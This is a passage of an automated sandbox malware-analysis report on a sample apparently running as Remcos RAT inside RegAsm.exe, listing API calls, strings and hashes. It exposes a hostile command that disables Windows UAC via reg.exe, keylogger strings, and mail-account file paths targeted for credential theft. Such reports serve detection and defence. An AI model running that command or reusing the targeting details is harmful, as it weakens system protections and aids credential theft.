                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 221034970-0
                                                                                                                            • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                                                                                            • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                                                                                            • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                                                                                            • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                                                                                                            APIs
                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                                                                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 221034970-0
                                                                                                                            • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                                                                                            • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                                                                                            • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                                                                                            • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                                                                                            APIs
                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                                                                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 221034970-0
                                                                                                                            • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                                                                                            • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                                                                                            • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                                                                                            • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                            • API String ID: 4036392271-1520055953
                                                                                                                            • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                            • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                            • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                            • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                            APIs
                                                                                                                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                                                                            • wsprintfW.USER32 ref: 0040B1F3
                                                                                                                              • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EventLocalTimewsprintf
                                                                                                                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                            • API String ID: 1497725170-248792730
                                                                                                                            • Opcode ID: 79592d734cdee8dd8f16df52a96ec572deaeb03d5d238ed8b569f41c59cd1f5a
                                                                                                                            • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                                                                                            • Opcode Fuzzy Hash: 79592d734cdee8dd8f16df52a96ec572deaeb03d5d238ed8b569f41c59cd1f5a
                                                                                                                            • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                                                                            • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                            • String ID: XQG
                                                                                                                            • API String ID: 1958988193-3606453820
                                                                                                                            • Opcode ID: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                                                                                                                            • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                                                                                            • Opcode Fuzzy Hash: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                                                                                                                            • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                            • String ID: 0$MsgWindowClass
                                                                                                                            • API String ID: 2877667751-2410386613
                                                                                                                            • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                                                                            • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                                                                                            • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                                                                            • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004077AA
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004077AF
                                                                                                                            Strings
                                                                                                                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                                                                                            • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                            • API String ID: 2922976086-4183131282
                                                                                                                            • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                                                            • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                                                                                            • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                                                            • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                                                                                            Strings
                                                                                                                            • Rmc-43JG4A, xrefs: 004076DA
                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-43JG4A
                                                                                                                            • API String ID: 0-627694406
                                                                                                                            • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                                                                                            • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                                                                                            • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                                                                                            • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                            • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                                                                            • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                                                                                            • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                                                                            • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                                                                                            APIs
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                                                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                            • String ID: KeepAlive | Disabled
                                                                                                                            • API String ID: 2993684571-305739064
                                                                                                                            • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                                                                                            • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                                                                                            • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                                                                                            • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                                                                                                            • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                                                                                                            • Sleep.KERNEL32(00002710), ref: 0041AE07
                                                                                                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                            • String ID: Alarm triggered
                                                                                                                            • API String ID: 614609389-2816303416
                                                                                                                            • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                                                                                            • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                                                                                                            • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                                                                                            • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
                                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
                                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
                                                                                                                            Strings
                                                                                                                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                            • API String ID: 3024135584-2418719853
                                                                                                                            • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                                                                            • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                                                                                            • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                                                                            • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                                                                            • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                                                                                            • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                                                                            • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                            • _free.LIBCMT ref: 00444E06
                                                                                                                            • _free.LIBCMT ref: 00444E1D
                                                                                                                            • _free.LIBCMT ref: 00444E3C
                                                                                                                            • _free.LIBCMT ref: 00444E57
                                                                                                                            • _free.LIBCMT ref: 00444E6E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3033488037-0
                                                                                                                            • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                                                                                                            • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                                                                                                            • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                                                                                                            • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                                                                                                            APIs
                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                                                                            • _free.LIBCMT ref: 004493BD
                                                                                                                              • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                                                                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                            • _free.LIBCMT ref: 00449589
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1286116820-0
                                                                                                                            • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                                                                            • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                                                                                                            • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                                                                            • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                                                              • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040FB05
